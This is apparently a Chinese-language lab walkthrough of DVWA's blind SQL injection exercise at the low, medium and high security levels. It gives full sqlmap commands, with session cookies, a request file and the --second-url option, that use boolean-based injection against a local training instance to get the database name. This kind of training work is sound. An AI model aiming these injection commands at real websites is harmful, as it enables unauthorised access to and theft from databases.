Security Level:low
1、在输入框1和123,发现回显不一样,会判断数据库是否存在该值,即与数据库产生交互,可能存在布尔盲注。
2、使用sqlmap自动化注入,显示会重定向到首页,可能需要cookie
3、获取cookie后,重新使用sqlmap,根据跑出结果使用布尔注入
python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="id=2; PHPSESSID=thu431bemmul4c09u6mskheepp; security=low" --batch
4、使用布尔注入,获取数据库名
python sqlmap.py -u "http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="id=2; PHPSESSID=thu431bemmul4c09u6mskheepp; security=low" --batch --technique=B --current-db
Security Level:medium
1、抓取数据包更改参数,根据回显,可能存在布尔注入
2、
将当前页面的数据包信息,复制到本地的txt文本里面,并在id=处标记*号
并将文本保存到sqlmap的根目录
将当前页面的数据包信息,复制txt文本,并在id=处标记*号,再将txt文本复制到sqlmap的根目录
此时txt文本的文件名为1.txt
3、使用sqlmap跑post型数据包,获取当前数据库文件名
python sqlmap.py -r 1.txt --technique=B --current-db
Security Level:high
1、输入123,根据回显,可能存在布尔注入
2、
由于这里输入时一个url,响应是另一个URL
故使用参数–second-url= (设置二阶响应的结果显示页面的url)
抓取数据包,传参为1&Submit=Submit
3、使用sqlmap获取当前数据库文件名
python sqlmap.py -u "127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/cookie-input.php#" --data="id=1&Submit=Submit" --second-url="http://127.0.0.1/DVWA-master/vulnerabilities/sqli_blind/" --cookie="id=123; PHPSESSID=thu431bemmul4c09u6mskheepp; security=high" --batch --technique=B --current-db